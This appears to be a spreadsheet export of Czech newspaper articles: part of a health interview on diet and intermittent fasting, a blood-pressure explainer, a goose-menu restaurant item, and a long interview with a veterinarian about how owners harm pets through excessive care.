nebo pneumologa. Jenže bohužel lidé na takové preventivní prohlídky nechodí. ■ Podle Světové zdravotnické organizace lze každému třetímu onemocnění zhoubným nádorem zabránit pouhou úpravou životního stylu. Jaký druh stravy je podle vás nejlepší? Domnívám se, že ze všech diet má stále nejlepší prokázaný vliv na kardiovaskulární zdraví středomořská strava. Relativní snížení kardiovaskulárního rizika je kolem 30 procent. Středomořskou dietu propaguje i americký kardiolog prof. Steve Nissen, který říká, že se nelze zaměřovat pouze na farmakoterapii, ale důležitá je změna životního stylu. Středomořská strava není jenom záležitost jídla. Vy si sednete s přáteli, spolu v klidu jíte, komunikujete a dáte si při tom dvě deci vína . Jde i o životní styl. My extrémně na všechno spěcháme a žijeme v neustálém stresu. Častokrát by stačilo jenom se zastavit a pak… aspoň chodit do schodů. To je skvělá bezplatná terapie! ■ Takže v rámci středomořské stravy doporučujetepítivíno? O tom, zda existuje bezpečné množství alkoholu pro běžnou populaci, se vedou vášnivé diskuse. Rozsáhlé epidemiologické studie ukázaly, že bezpečné množství alkoholu k zamezení celkových zdravotních rizik je i pro běžnou populaci nižší, než se očekává. Dokonce i jeden nápoj denně může zvýšit počet úmrtí souvisejících s rakovinou. U pacientů s jakýmkoliv chronickým onemocněním jater, zejména u pacientů se ztučněním jater, se požívání alkoholu nedoporučuje. ■ Zmiňovala jste,že jednou z cest k zdravé dlouhověkostijepřerušovanýpůst.Jak vůbecfunguje? Stimuluje autofagii, což je mechanismus buněčné opravy. (Název vznikl z řeckého slova autóphagos neboli sebepojídání, jde o naprosto přirozené procesy, jimiž se buňky našeho těla zbavují přebytečných nebo nefunkčních částí. Autofagie se tímto způsobem podílí na udržení stálosti vnitřního prostředí. Proces autofagie objasnil japonský biolog profesor Jošinori Ósumi díky sledování kvasinek pod mikroskopem. Všiml si, že když kvasinky vystaví nějakému stresoru – například v podobě nedostatku dusíku v prostředí –, začnou se u nich tvořit vakuoly, resp. dutinky v buňce sloužící k rozkladu odpadních látek. Kvasinky tak začínají v podstatě rozkládat svůj vlastní obsah, aby získaly látky, které jim v „potravě“ chybí. Objasněním tohoto procesu získal Ósumi v roce 2016 Nobelovu cenu za fyziologii a lékařství, pozn. red.) Tím pádem podporuje obnovu buněk, přispívá k opravě DNA a stabilizaci genomu. Zároveň snižuje koncentraci zánětlivých markerů u různých autoimunitních onemocnění – u cukrovky prvního typu, revmatoidní artritidy, systémového lupus erythematodes (typ chronického zánětlivého onemocnění psoriázy, kdy se tvoří autoprotilátky proti DNA, a působí tak zánětlivou reakci s poškozením kůže, kloubů, srdce, ledvin, mozku atd., pozn. red.) nebo roztroušené sklerózy. Dokonce je studie, že přerušovaný půst je velkým příslibem coby adjuvantní (dodatečná protinádorová léčba, pozn. red.) terapie kolorektálního karcinomu. Nebo i u karcinomu prsu. Je množství studií, jež popisují pozitivní vliv na vymizení diabetu nebo na snížení výskytu rakovin. Vždy záleží na komorbiditách (přítomnost jednoho či více onemocnění vyskytujících se současně s primární chorobou, pozn. red.), jestli pacient nemá jiné onemocnění atd. Na vše jsou studie a tvrdá data. Takže přerušované půsty mohu jednoznačně doporučit, protože přispívají k dlouhověkosti. ■ Jaký přerušovaný půst je nejlepší? Aby bylo možné na tohle poskytnout skutečně nezpochybnitelnou odpověď, je nutné zlepšit kvalitu a kvantitu klinických studií zaměřených na přerušovaný půst. Metoda 16/8 (16 hodin půstu a 8 hodin, kdy můžete jíst) se ukazuje jako nejvíce výzkumně podložená a snadno udržitelná pro většinu lidí. Metoda 5 : 2 (jíte normálně 5 dní v týdnu a 2 dny se omezíte na 400 až 600 kilokalorií) je flexibilní a může být snadno přizpůsobena různým životním stylům. Příkladem takových půstů je v muslimském světě ramadán. (Jeden z měsíců islámského lunárního kalendáře. Jedná se o nejsvětější měsíc v muslimském světě. Během celého období muslimové drží speciální půst, jenž je má více přiblížit duchovní podstatě islámu. Půst trvá od úsvitu do západu slunce. Jeho hodinové trvání je závislé na ročním období i na tom, kde na světě se muslim nachází. Bývá to až 20 hodin, pozn. red.) U pacientů, kteří drží ramadán, je po tomto období zaznamenáno zlepšení zdravotních výsledků. ■ Dietologové zdůrazňují, že není ani tak rozhodující půst, ale spíše to, co člověk jí v době, kdy může konzumovat potravu… To je pravda. Jedna věc je půst a autofagie, kdy dochází k odumírání poškozených buněk a jejich obnově, a pak je doba, kdy se může jíst. A spousta lidí v tomto období ztláská úplně všechno, což je špatně. Preferuji tzv. fasting-mimicking dietu, která má za cíl napodobit účinky půstu, aniž by bylo nutné se úplně vzdát jídla. Tento přístup byl vyvinut profesorem Valterem Longem a jeho týmem z univerzity v Los Angeles a je zaměřen na zlepšení zdraví a prodloužení života prostřednictvím cyklického omezení kalorií a specifických živin. Spočívá v konzumaci nízkokalorické rostlinné stravy s nízkým obsahem bílkovin a cukru a s vysokým obsahem nenasycených tuků. Mimochodem u těchto diet je popsáno, že kromě jiného snižují i riziko onemocnění Alzheimerovou nemocí. MUDr. Jana LUPínkoVá (53), CSc. Vystudovala 3. lékařskou fakultu Univerzity Karlovy, 26 let pracovala v Institutu klinické a experimentální medicíny ( IKEM ) v Praze , nejdříve na klinice diabetologie, poté na pracovišti preventivní kardiologie, naposledy jako zástupkyně přednosty. Od roku 2023 působí v EliteMedical na klinice komplexní kardiovaskulární a onkologické prevence a ve své diabetologické ambulanci – DIAcentrum dr. Lupínkové, s. r. o. Foto:MichalSváček /MAFRA Foto:Shutterstock.com ▼ Jak si udržet zdraví a kondici? Jednou z cest je správně jíst, tedy omezit cukry a tuky a zaměřit se více na bílkoviny a vlákninu. Chce to ovoce, zeleninu, luštěniny, maso nemusí být denně, a když, pak raději lehčí (zařadit bychom měli ideálně aspoň jednou týdně mořskou rybu). V poslední době se hodně doporučuje tzv. přerušovaný půst, kdy se den rozloží na dvě části. V té delší (obvykle 14, ale někdo zvládne i 16 hodin) se nejí, a ve zbylých 10, popř. 8 hodinách se jí. „Některé typy nádorů rostou velice rychle.“ ◄ Včasná diagnostika a předcházení nejrůznějším onemocněním podle MUDr. Lupínkové významně souvisí se zdravou dlouhověkostí. „Alarmující je, že preventivních prohlídek u praktického lékaře se v Česku účastní méně než 40 % dospělých.“ Foto:Shutterstock.com, Michal Sváček /MAFRA „Středomořská strava je nejlepší ze všech diet.“ Průměrný věk dožití se stále prodlužuje. Podle statistiků mají nyní čeští muži před sebou v průměru 77 let, ženy dokonce 83 let života. Ale pozor! Tzv. kvalitní délka života (tedy doba, kdy se cítíme fit, jsme soběstační a můžeme si život užít) je až o 15 let kratší než doba dožití. Autor: Lubor Černohlávek Autor Lubor Černohlávek Rubrika transition_slide rozhovor</t>
  </si>
  <si>
    <t>200000</t>
  </si>
  <si>
    <t>20241101_701_3239763854_f6b1f6cc521180ee7734.html</t>
  </si>
  <si>
    <t>f6b1f6cc521180ee7734</t>
  </si>
  <si>
    <t>VYSOKÝ KREVNÍ TLAK většinou nebolí</t>
  </si>
  <si>
    <t>VYSOKÝ KREVNÍ TLAK většinou nebolí VYSOKÝ KREVNÍ TLAK PATŘÍ DO SKUPINY CIVILIZAČNÍCH ONEMOCNĚNÍ, KTERÁ ČASTO ZANEDBÁVÁME, PROTOŽE NEBÝVAJÍ SPOJENA S AKUTNÍM POCITEM BOLESTI. ALARMUJÍCÍ STATISTIKY Za optimální se považuje tlak mírně pod 120/80 mm Hg. O vysokém krevním tlaku hovoříme ve chvíli, kdy vám lékař nejméně při dvou oddělených měřeních zjistí hodnoty vyšší než 140/90 mm Hg. ZÁKEŘNÉ ONEMOCNĚNÍ Hypertenze je nemoc plíživá, která v počátečním stadiu nemá žádné viditelné příznaky. Projeví se tak často až v okamžiku, kdy už může mít smrtelné následky – při prasknutí aorty, mozkové příhodě či infarktu. Přesto existuje několik nespecifických příznaků, které mohou napovědět, že se tento problém týká i vás. Nejčastěji se jedná o bolest a motání hlavy, hučení v uších a bolestivost na hrudním koši. Často se objevuje také náhlé krvácení z nosu, be zjevné příčiny. VČASNÉ ŘEŠENÍ Pokud při zvýšeném krevním tlaku nemyslíme na prevenci, má to obvykle za následek doživotní medikaci s vedlejšími účinky. Může se jednat např. o snížení libida, erektilní dysfunkce, inzulinovou rezistenci, poškození cév a mnoho dalších. Jestliže vám tedy lékař opakovaně měří rostoucí hodnoty krevního tlaku, je nejvyšší čas upravit životosprávu. V první řadě se doporučuje přestat kouřit a pít alkohol . Přidat na pohybu, i když nemáte nadváhu. Omezit příjem soli, protože sůl zadržuje vodu v těle, zvyšuje objem cirkulující tekutiny v cévách a tím i tlak potřebný k zajištění krevního oběhu. PODPORA Z PŘÍRODY Riziko doživotní medikace můžete zmírnit či oddálit včasným užíváním preparátů na přírodní bázi. Ke snížení tlaku mohou přispívat následující byliny: Jmelí, meduňka a srdečník patří mezi ty, které tradičně podporují normální činnost srdce. Vyzkoušet můžete také doplňky na bázi hlohu snižujícího krevní tlak, celeru omezujícího nežádoucí zadržování tekutin nebo vinné révy, která pomáhá snižovat tlak a pečuje o srdce i cévy. Konopí hraje také významnou roli, protože tato rostlina blahodárně působí na celý kardiovaskulární systém.</t>
  </si>
  <si>
    <t>20241101_702_3239764001_a4f0e02d30eb2af1a221.html</t>
  </si>
  <si>
    <t>a4f0e02d30eb2af1a221</t>
  </si>
  <si>
    <t>Restaurace zvou na husy</t>
  </si>
  <si>
    <t>Restaurace zvou na husy Tradiční svatomartinské menu chystá řada podniků i v Budějovicích a okolí. Někde bude jen na objednávku. Domácí husí paštika s glazovanými hruškami a toustem, husí kaldoun s droby a nudlemi, čtvrt pečené svatomartinské husy na jablkách s karlovarským a bramborovým knedlíkem a červeným a bílým zelím, nebo půlka kachny. Na závěr lívanečky s povidly, tvarohem a strouhaným perníkem. Tak vypadá svatomartinské menu, které budou v Šindlovské krčmě v Šindlových Dvorech u Budějovic nabízet od 8. do 11. listopadu. „Držíme se klasiky, jako polévka je vždycky kaldoun, husu i kachnu připravujeme každý rok stejně. Lidé většinou nechtějí žádné experimenty. Obměňujeme jen předkrm a dezert. Ceny držíme stejné jako loni,“ popsal jeden z provozovatelů krčmy Petr Pavlas a dodal, že zájem o jejich tradiční listopadové menu, k němuž mohou hosté pít Svatomartinské pivo nebo víno , je rok od roku vyšší. „Přijdou i místní, které u nás celý rok nevidíme. Ale na husu vyrazí,“ všiml si. Svatomartinské menu nabízí i řada dalších podniků v Českých Budějovicích a okolí. Třeba restaurace U Karla IV. láká na celou husu nebo stehno od 8. do 17. listopadu. Zájemci si ji musí dopředu objednat a pak dostanou menu od paštičky po zákusek, jak píšou na svém webu. Na huse si lidé pochutnají i v Masných krámech (7.–11. 11.), v Solnici (8.–11. 11.), ve Špalíčku (8.–17. 11.), v Kozlovně (9.–11. 11.) nebo v Perle (9.–11. 11.). Tradiční podzimní menu chystají i v českobudějovickém Bistru Magdalene, kde kromě klasického husího stehna připravili novinku. „Budou to prsa na asijský způsob s jasmínovou rýží. Jako polévka bude kaldoun,“ doplnil provozní podniku Radim Dunaj. KLASIKA STEHNO, KNEDLÍKY A ČERVENÉ ČI BÍLÉ ZELÍ. NA TOM SI LIDÉ POCHUTNAJÍ. Autor: TEXT: KAREL HRDINA FOTO: ANNA VAVRÍKOVÁ, MAFRA Autor person Karel Hrdina</t>
  </si>
  <si>
    <t>20241101_703_3239763514_bdedd7cc5f3eb86563fc.html</t>
  </si>
  <si>
    <t>bdedd7cc5f3eb86563fc</t>
  </si>
  <si>
    <t>Psy a kočky dusíme láskou a přehnanou péčí. Pácháme zlo v dobré víře</t>
  </si>
  <si>
    <t>Psy a kočky dusíme láskou a přehnanou péčí. Pácháme zlo v dobré víře Rubrika: KONTEXT Veterinářka Martina Načeradská dlouhá léta provozuje vlastní kliniku. Je specialistkou na poruchy chování psů a koček, ale hodně toho ví také o „poruchách chování“ lidí k jejich zvířatům. „Viděla jsem velmi ošklivé případy skutečného záměrného týrání, ale dušení mazlíčků láskou a přehnanou péčí je častější. A děje se v dobré víře.“ Začala bych trochu v nadsázce. Vypozorovala jste, čím se liší pejskaři od kočičkářů? Obecně asi každý ví, že kočka je spíš nezávislá, nevisí tolik na svém majiteli, je samostatnější. Pes je na majitele vázaný velmi silně. Ale mám klienty, jejichž kočky na nich visí jako pejsci. A typický majitel kočky? To může být oříšek pro psychologa. Proč? Dělám si samozřejmě legraci, ale lidi si vybírají k sobě podobná zvířata. A kočky jsou dost často paranoidní pesimisti. Paranoidní pesimisti? To mi musíte vysvětlit. Kočka je lovec i kořist. Často je na lovu, ale zároveň se pořád bojí, že ji něco sežere… Vy sama máte dvě kočky. Jste paranoidní pesimista? Oříšek pro psychologa? Můj kocour je úzkostný a já taky. Docela dost. Můj kocour mi spí v noci v nohách, ale jinak je „nesahej na mě“. Já k sobě taky hned tak někoho nepustím. Můj kocour se bojí cizích lidí. Já taky. Proto léčíte zvířata, ne lidi. Přesně tak! (směje se) Ale náš druhý kocour, to je manželův mazel, je na něm pořád nalepený, chce mazlit. Říkáme, že je na suchý zip. A co psi a pejskaři? Pejskaři si pořizují zvíře s vědomím, že na nich bude závislé, že jim bude oddané a že se naučí je poslouchat. Většinou je všechno akorát, pejskaři mají svoje pejsky dobře vychované a zároveň jim dávají určitou míru svobody, ale docela často vidím něco jako „overcontrol“. Přehnaná kontrola? Člověk má to zvíře tak pod kontrolou, že se pes sám ani nevyčurá, pokud nedostane povel. Pak bývá pes ve stresu, má úzkosti a bojí se, nebo je naopak hyperaktivní a agresivní. Dělaly se studie u lidí, kteří se dostávají do deprese, když je někdo pořád kontroluje. U psů je to podobné. Samozřejmě je to opět trochu nadsázka, ale myslím, že hodně lidí má psa a je jim příjemné, když je někdo na slovo poslouchá, když ho mají pod kontrolou. Ale moje klienty, ať už to jsou pejskaři, nebo kočkaři, v naprosté většině naštěstí něco spojuje: láska k jejich zvířatům. ZVÍŘÁTKO NENÍ MIMINKO Ale neubližujeme vlastně svým zvířatům nejvíc právě tou láskou? Viděla jsem velmi ošklivé případy skutečného týrání, ale máte pravdu, že to „týrání“ skrze dušení láskou a přehnanou péčí je častější a děje se v dobré víře. Vidím to hodně u lidí, kteří nemají děti a kteří mají svoje zvířátko jako miminko. Zahrnují jej láskou a péčí… Někdy je pro ně třeba těžké pochopit, že pes musí mít i nějaký čas pro sebe, musí mít nějakou volnost, musí „dýchat“. Ale hodně lidí si naštěstí nechá poradit. Svým mazlíčkům ve jménu lásky a péče ubližujeme taky překrmováním či nedostatkem, nebo někdy naopak přemírou pohybu. A ani to neustálé mazlení není dobrý nápad. Zůstaňme chvíli u toho. Jaké tedy dělají chovatelé chyby? S nesprávným krmením se setkávám hlavně u starších lidí a často u lidí obézních. Přijde korpulentní majitel a s ním velmi podobný pes. Nechci nikoho urazit, sama nejsem štíhlá, ale kocoury štíhlé mám. Mně doma nikdo nezabaví klíče od ledničky, ale když já kočkám neotevřu konzervu, nežerou – a s tím je dobré pracovat. Je potřeba dávat pozor. Granule mají opravdu hodně kalorií na malý objem, je v nich hodně cukrů, aby právě držely tvar. Granule jsou kaloričtější než vlhké krmení z konzervy. Jsou praktické, ale kočky to rychle sežerou a majitel má tendenci jim dávat víc, než potřebují, protože opticky to vypadá, že měly málo. A kočky jsou pak obézní. Podobné je to u psů. Doporučuju klientům interaktivní, chytrá krmítka. Jednomu říkám odkapávač. Jsou tam kalíšky, body, vlnovky a čtverečky – kočka musí vyřešit úkol, než dostane granule, musí pro to něco udělat. Nevysypou se hned. Obezita u zvířat, stejně jako u lidí není jen estetický problém, váže se na ni spousta nemocí. Je těžké klientům vysvětlit, že nutriční blahobyt zvířatům dobře nedělá? Někdy je to těžké. Rodiče jedné mé známé adoptovali pejska a za tři měsíce ho vykrmili o sedm kilo. Kdykoliv udělal psí oči, dají mu pamlsek. „Vždyť tak smutně kouká!“ Jenže pejsek moc dobře věděl, co na páníčky funguje. Některé kočky, když chtějí kontakt, přijdou za člověkem a udělají „mňau“. Ony jinak moc nemňoukají, mňoukání používají hlavně pro dorozumívání s lidmi. Kočka přijde, mňoukne a dostane žrádlo. Tak se na to naučí. A je mlsná, samozřejmě nepřijde, jen když jí v břiše kručí hlady. Copak my jíme, jen když máme hlad? Přitom původně přišla a mňoukla, protože chtěla jen pozornost. Žrádlo dostala jako šidítko… stačilo si s ní chvíli hrát. SEŽRANÉ LILIE Když jsme u toho žrádla. V naší redakční konverzaci se nedávno strhla smršť, co psi a kočky smí a nesmí jíst, co je pro ně toxické, po čem jim selhávají ledviny a játra. Nastal totální chaos. Hroznové víno ti zabije psa! Ne, náš pes to žere a je v pohodě. Je něco opravdu toxického z toho, co chutná nám, ale psa nebo kočku to otráví? Jednoznačně můžu odpovědět jen jedno: čokoláda. A kafe. To hroznové víno je sporné. Opravdu jsou popsané případy, kdy psovi selhaly ledviny, když žral víno nebo rozinky, ale nikdy se nepřišlo na to, jaká látka z toho vína za to může. V nové učebnici zvířecí toxikologie se hrozny a rozinky uvádí, ale neví se, čím to je. Mohla to být i nějaká plíseň. Ale asi je rozumnější neriskovat a vína se vyvarovat, pes o nic nepřijde, když si nedá. Vím, že pro kočky jsou extrémně toxické lilie. Asi jim hodně voní a mají tendenci je ožírat, ale nemusí to dopadnout dobře. Měla jsem klienta, který nesl kytici svojí mamince do nemocnice, lilie. Z nemocnice ho s tím vykázali, že kytky na pokoj nepatří kvůli možným alergiím, tak ji dal domů. Měl dvě kočky. Když se vrátil po práci domů, kytka byla ožraná, hned sbalil kočku a odvezl ji na veterinu k nám… Dostala infuzi a lék zabraňující vstřebávání látek ze střeva a povedlo se ji zachránit, ale měla namále. Zmínila jste, jak je důležité, aby kočky měly pohyb a zábavu. Trpí kočky, které jsou jen doma, nedostatkem pohybu? Obávám se, že často trpí. Potřebují se zabavit, potřebují hru a pohyb. Venku si kočka několikrát za den obejde svoje teritorium, něco si uloví. Ale doma dostane misku, nažere se a vyvalí na gauč. Jsou kočky, které jsou samy od sebe aktivní, ty si vystačí. Můj bengálský kocour lítal nezřízeně po bytě sem a tam, až mu manžel vyrobil velké šlapací kolo. Už víc než 10 let si v něm skoro pořád šlape. A je štíhlý a svalnatý. Ten kocour. A druhý, to je větší povaleč, ale okoukal to, takže taky sportuje. Některá plemena totiž vůbec nejsou do malého bytu vhodná. Mimo jiné bengálský kocour, což jsem zjistila tak, že jsme si ho pořídili. Ale ale. Ano, můj muž říká, že fakt nemůžu klientům nadávat, že si pořizují zvíře jenom proto, jak vypadá, protože jsem udělala v podstatě to samé. Ale náš kocour se stal naším velkým učitelem. Učitelem chování a poruch chování. Vidím, jak mu domácí prostředí nesvědčí, věnuju se mu každý den, když se vrátím z práce, snažím se, aby měl zábavu. Ale obecně – kočka když může ven, má šťastnější život. Ale kratší. To vím moc dobře… Jak to? První kočku jsem měla, když mi bylo čtrnáct. Za dva roky kočku zajelo auto. Další kočku taky po pár letech zajelo auto. Venku byly šťastné. Lovily, neměly problémy se zuby ani s váhou, žily plnohodnotný kočičí život. Ale představa, že mi další kočku zajede auto, už pro mě byla nesnesitelná. Dalšího kocoura jsem měla třináct let. Ale byl jen doma. Musela jsem přizpůsobit byt. Všude škrabadla, hračky. Věnovala jsem se mu, hráli jsme si. Jsou kočky, které jsou naturelem peciválové, ale mnohé ne. Akční kočka potřebuje akci. Ale když kočka chodí ven, musíme se smířit s tím, že její život bude kratší. A že bude likvidovat ptáky, jak upozorňují ornitologové. Kočky jsou masové vražedkyně, šéf České ornitologické společnosti říká, že v průměru uloví jedna volně chodící kočka jednoho ptáka týdně, to jsou ročně na ty statisíce koček slušná čísla. Já vím, řešili jsme to v rámci kurzu etologie koček. Je dobré nepouštět kočky hlavně za rozbřesku a při stmívání, kdy jsou ptáci nejaktivnější. Měly by se pouštět jen ve dne a ne v době hnízdění ptáků. Dále by měly dostávat kvalitní žrádlo s vysokým obsahem bílkovin, navíc kočce se dá pověsit na krk rolnička, aby pták stihl uletět… Moje kamarádka má koček pět a pouští je ven s rolničkami – její soused je totiž ornitolog. A je to prý v pohodě. Ale myslím, že u nás to není takový problém jako v Austrálii , kde kočky dřív vůbec nežily. Tady žila vždycky kočka divoká… To samozřejmě ano, kočka je v naší krajině přirozený predátor. Problém je, že v přirozeném prostředí je predátorů jen tolik, kolik se jich přirozeně uživí. Koček je mnohem víc, protože je živí a hýčkají jejich majitelé, ale samozřejmě loví, když mají možnost. Pak mají těch ptáků na svědomí opravdu kvanta. K tomu je dobré dbát těch opatření. Ale kočky neloví jen ptáky, ale žáby, myši a další drobné savce, pavouky i velký hmyz… Pro psa je pochopitelně týrání ho nevenčit, ale říkala jste, že i nadměrný pohyb může být problém. Jak to? Příliš dlouhé výlety. Výlety na kole… Když vyrazíte se psem na výlet na kole, vy třeba ujedete dvacet třicet kilometrů a řeknete si, že se pejsek hezky proběhne, jenže on toho okolo naběhá dvakrát tolik. Na asfaltu si sdírají polštářky na tlapkách do krve. Pes na sobě nedá znát únavu, prostě běží a běží… Jasně, jsou fyzicky zdatní psi, kteří to dají úplně v pohodě, ale třeba starší pes, ten taky jde nebo běží, dokud jde nebo běží páníček, ale může pak být totálně vyčerpaný. Měli jsme tu klienty s fenkou, starší dámou, tatínek její paničky ji vzal na dvacetikilometrovou túru, zvládla to, jistě, vypadala „šťastná“. Ale druhý den volali, že pes jen leží, že se bojí, co mu je. Fenka byla vyčerpaná. Dopadlo to dobře, odpočala si a vzchopila se, ale může to mít i fatální následky. Pes je opravdu věrný a oddaný, nedá na sobě únavu znát a může zkolabovat. S ADRENALINEM NEVNÍMAJÍ BOLEST Jak tedy poznám přiměřený pohyb? Obecně bych řekla, že to kolo je prostě nebezpečné, na něm jezděte bez psů. Když jdete na delší vycházku a po návratu pes jen leží, asi to na něj bylo moc a je dobré s tím nějak počítat propříště. Ale někdy se přehání i hra, třeba míčky. Psům se vyplavuje adrenalin, nevnímají bolest, necítí únavu. Vidí pohyb míčku, vyplavuje se jim adrenalin. Jdou po něm. Velí jim tak jejich instinkty. Znám případy, kdy jim lidi házeli míček několik hodin. Měla jsem tu fenku, které při házení míčků prasknul deltový sval. Kvůli adrenalinu necítila bolest, běhala a skákala, nedala najevo problém. V místě, kde měl být celistvý deltový sval, měla hmatatelné přerušení a hematom, a přitom vůbec nekulhala. S běháním je to podobné. Psi si pak pěstují závislost na adrenalinu. Zpět k původní otázce. Jak poznat míru? Je to strašně individuální, člověk to musí vychytat. Znát svého psa, všimnout si, kdy to přehnal, a příště si dát pozor. Obzvlášť u štěňat je to zrádné. Přijdou z vycházky, ale pořád jsou aktivní. Majitel má pocit, že štěně asi málo „vyběhali“, jenže hyperaktivita může být projevem stresu. Čím víc se snažíme vyběhat, vylítat, vyskákat a unavit, tím hůř. V rozhovoru s vámi jsem četla, že když majitelé berou psa do práce, aby nemusel být doma sám, opět mu – v dobré víře – mohou ubližovat. Jak to? Pokud má pes úzkost z odloučení, je asi v pořádku ho do práce vzít, ale je potřeba to promyslet a v práci zařídit tak, aby měl pes svůj klid. Když je totiž pes je v cizím prostředí, je pořád „na stráži“. Hlídá svého pána. Neodpočine si. Měla jsem případ, kdy pes útočil majitelce na klienty, když ho měla s sebou v práci. Měla v kanceláři stůl, za kterým seděla, a pes byl před stolem, tedy mezi stolem a dveřmi. Byl to dobře vychovaný pes, ale když někdo přišel do místnosti, měl tendenci na něj vrčet a útočit. Paní majitelka to nechápala… Vysvětlila jsem jí, že pokud chce mít psa v práci, musí ho mít někde za sebou, ona musí být tou bariérou, aby psovi bylo jasné, že tam není proto, aby ji hlídal. Udělala mu pelech v rohu místnosti za sebou a už to bylo v pořádku. My si to moc neuvědomujeme, ale pes potřebuje svůj klid a potřebuje i docela dost spát. Štěňata i dvacet hodin denně. I proto jsou ty dlouhé procházky problematické, když psi nemůžou spát, jsou pak vystresovaní a hyperaktivní a my máme tendenci je víc unavit. Jenže oni potřebují klid. Pes v práci ok, ale musí mít pelíšek někde v klidnějším koutě, aby nemusel vyskakovat pokaždé, když někdo jde kolem. Z pohledu sousedky musím říct, že mi bude vždycky milejší pes kolegy v práci než zoufale vyjící pes u sousedů. To chápu. Někteří psi jsou doma úplně v pohodě, ale úzkostnější psi prostě bez pána doma nespí a štěkají nebo vyjí. Trpí pes, trpí sousedi. Existují „protištěkací“ obojky, kdy pes dostane po zaštěkání stříkanec citronovou vodou nebo elektrický impulz. Ale tyto obojky rozhodně neschvaluji, vůbec neřeší problém, naopak to ve výsledku mohou ještě zhoršit. Jsou psi, kteří jsou doma opravdu nešťastní, nejí, nepijí, nevyspí se, když mají obojek, ani se neprojeví štěkáním. Hubnou a chřadnou. Dneska je tam možné dát aspoň kameru, abychom věděli, jak na tom to zvíře je. Ale když ho nemohou mít ani v práci a doma je to zvíře nešťastné, je to dost nešťastná situace. Člověk si samozřejmě řekne, neměli si ho pořizovat, ale asi nemohli vědět, že jejich pes tohle nezvládne… Když si chci pořídit psa, musím se zamyslet nad tím, jestli jsem schopná nebo ochotná mu přizpůsobit svůj život – věnovat mu dostatek času, chodit s ním na procházky, případně ho sebou brát do práce, kdyby nezvládal být doma sám. Psa lze vycvičit na to, aby byl schopný zůstat doma sám, ale štěně většinou ne. Je to psí dítě, dvou- nebo tříměsíční štěně nezvládne být doma samo bez následků. Většina lidí doma dvou- nebo tříleté ani starší dítě nenechá, ale štěně samotné doma nechají. Pokud vím, že nebudu mít čas se štěnětem trávit čas doma, doporučuji radši kočku. Spíše dvě, aby jedna netrpěla tím, že majitel není často celý den doma. Kolik toho člověk může napáchat v dobré víře, že? Určitě. Snažím se dělat osvětu, kde se dá. Spousta lidí netuší, že něco dělají špatně. Milují svá zvířata. Ale když je milují a jsou ochotní o tom mluvit a taky naslouchat, dá se leccos spravit, změnit. ABY PES VĚDĚL, KDO JE PÁN Máte nějaký „oblíbený“ mýtus, který se týká koček nebo psů? Těch je! Díky mýtům jsem mimo jiné přeložila do češtiny knížku od Barryho Eatona Psí dominance, mýtus nebo skutečnost? Tedy knihu vyvracející mýty o psech. Jaké třeba? „Pes nesmí spát v posteli.“ „Pes nesmí první do dveří, protože by získal dominanci nad domácností.“ „Pes musí jíst až poslední.“ Eaton to bere jedno po druhém a vysvětluje, proč je to hloupost. V televizi pořád běží pořad, který mi hýbe žlučí. Tam se pořád razí me- tody, že na psa se musí zakleknout, zalehnout, aby věděl, kdo je pán. Napsala jsem k tomu do televize dlouhý elaborát, kde argumentuju proti tomu, co v tom pořadu Kočka není pes hlásají. Ale dozvěděla jsem se od nich, že je to je přece „zábavný pořad“, takže lidi by neměli brát vážně to, co se tam říká. No tak super, jestli tam doporučují „zábavné metody“… Tak nějak. Třeba jedna paní podle toho pořadu povalila svého dalmatina na záda a řvala na něj, aby tedy potlačila jeho dominanci. A skončila na chirurgii s prokousnutým nosem. Ty metody jsou totálně zastaralé, výcvik je úplně jinde. Už víme, že smečky divokých psů nebo vlků fungují spíš jako rodina, že ten „alfa“ pár jsou vlastně rodiče a kolem nich je pár mladých, případně tety nebo strýcové a případně nějaký přidružený jedinec. A taky už dobře víme, že psi vychovávaní lidmi jsou mnohem agresivnější než divocí psi nebo vlci vychovávaní smečkou. Smečka funguje na základě komunikace, ne dominance za každou cenu. Hezky o tom mýtu u vlků mluví v našem rozhovoru zoolog Miroslav Kutal . Dominanci si vytváří jen ve větších smečkách v zajetí. Je to tak. Mluvila jsem s Davidem Mechem , profesorem, který kdysi pozoroval vlky právě v zoologické zahradě a na základě toho popsal teorii dominance, která se aplikovala i u psů. A teď objíždí svět a všude říká: Spletl jsem se, není to tak, omlouvám se. Snaží se to napravit. Ten mýtus je ale tak zažitý, že ubližuje dodnes. Vychází se z toho, že je potřeba psa „zdominovat“, jasně mu ukázat, kdo je tady pán, aby neovládl rodinu. Jenže pokud někteří psi „ovládají“ rodinu, pak to není problém dominance, ale nemají nastavené hranice. Je to stejné jako s dětmi, které taky musí vědět, co můžou a co ne, musí mít nastavené hranice a nějaký řád a pravidla. Psa musíme naučit: „Tohle je gauč, kde sedíme my, ty máš tamhle svoje místo.“ Ne ho nechat nás z gauče vytlačit. Když psa učíme, dáváme mu jasné povely, není potřeba mu násilně ukazovat naši dominanci. VYTAHAT PSA NA VODÍTKU? MŮŽE HO TO ZABÍT Nepřiměřené a nesprávné trestání je asi také problém, že? Ano. Nejhorší jsou náhodné tresty, když pes neví, za co je trestaný. Když někdo přijde domů a je zničený koberec a pán psa následně potrestá, pes nechápe, za co to je, nespojí si, že je to kvůli koberci. On byl sám doma a nudil se nebo se bál. Bohužel pořád rozšířený je trest vycukání psa na vodítku. Vycukání na vodítku? Jak si to mám představit? Klasický trest, buď psa trhavými pohyby někdo vycuká, nebo řekněme vytahá na vodítku, nebo dokonce na vodítku vyvěsí. Zvedne se do výšky, aby „poslouchal“. Zraňuje se tím ale štítná žláza, krční cévy, zamezuje se přísunu krve do mozku, zvyšuje se nitrooční tlak. Vyvěšením mů- žete psa i zabít. To jsou staré, přežité, nefunkční a bolestivé výcvikové metody. Už se dostáváme ke zjevnému týrání. Téma množíren by bylo na samostatný rozhovor, ale zeptám se jen: ta situace se zhoršuje, nebo zlepšuje? Dokud bude poptávka, bude i nabídka. Jsme strašně konzumní společnost. Když se rozhodneme, že něco chceme, chceme to hned teď a pokud možno i lacino. Slušní chovatelé nejsou schopni pokrýt poptávku okamžitě a správná péče o chov je nákladná, nemohou jít pod cenu. A tak si člověk pořídí pejska hned, teď a za slušnou cenu a podle svých představ. Na inzerát. S velkou pravděpodobností to bude pejsek z množírny. Četla jsem statistiky, že lidé mají šlechtěná zvířata, ale nejčastěji šlechtěná bez papírů. A to je ono. Rodina si řekne: „My nechceme chodit na výstavy, nám stačí pejsek bez papírů.“ Jenže papíry jsou většinou punc dobrého chovu. Samozřejmě i mezi chovateli jsou čuňata, ale existuje alespoň záruka, že si na ně může došlápnout ČMKU, Českomoravská kynologická 